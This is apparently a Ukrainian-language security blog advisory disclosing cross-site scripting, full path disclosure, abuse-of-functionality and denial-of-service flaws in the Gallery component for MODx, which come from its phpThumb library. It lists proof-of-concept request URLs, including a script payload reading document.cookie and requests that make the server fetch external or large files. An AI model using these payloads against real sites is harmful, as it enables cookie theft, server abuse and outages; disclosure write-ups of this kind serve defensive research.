Websecurity - Веб безпека

У липні, 31.07.2014, я виявив численні уразливості в Gallery для MODx. Зокрема Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service уразливості. Про що найближчим часом повідомлю розробникам веб додатку.

В компоненті Gallery для MODx використовуються phpThumb. Ця бібліотека має XSS, FPD, AoF і DoS в уразливості подібні до TimThumb, тому Gallery теж вразливий.

XSS (WASC-08):

http://site/assets/components/gallery/connector.php?action=web/phpthumb&src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/assets/components/gallery/connector.php?action=web/phpthumb
http://site/assets/components/gallery/connector.php?action=web/phpthumb&src=http://

Abuse of Functionality (WASC-42):

http://site/assets/components/gallery/connector.php?action=web/phpthumb&src=http://site&h=1&w=1

Denial of Service (WASC-10):

http://site/assets/components/gallery/connector.php?action=web/phpthumb&src=src=http://site/big_file&h=1&w=1

Уразливі всі версії компонента Gallery для MODx.

This entry was posted on 23:54 22.04.2015 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.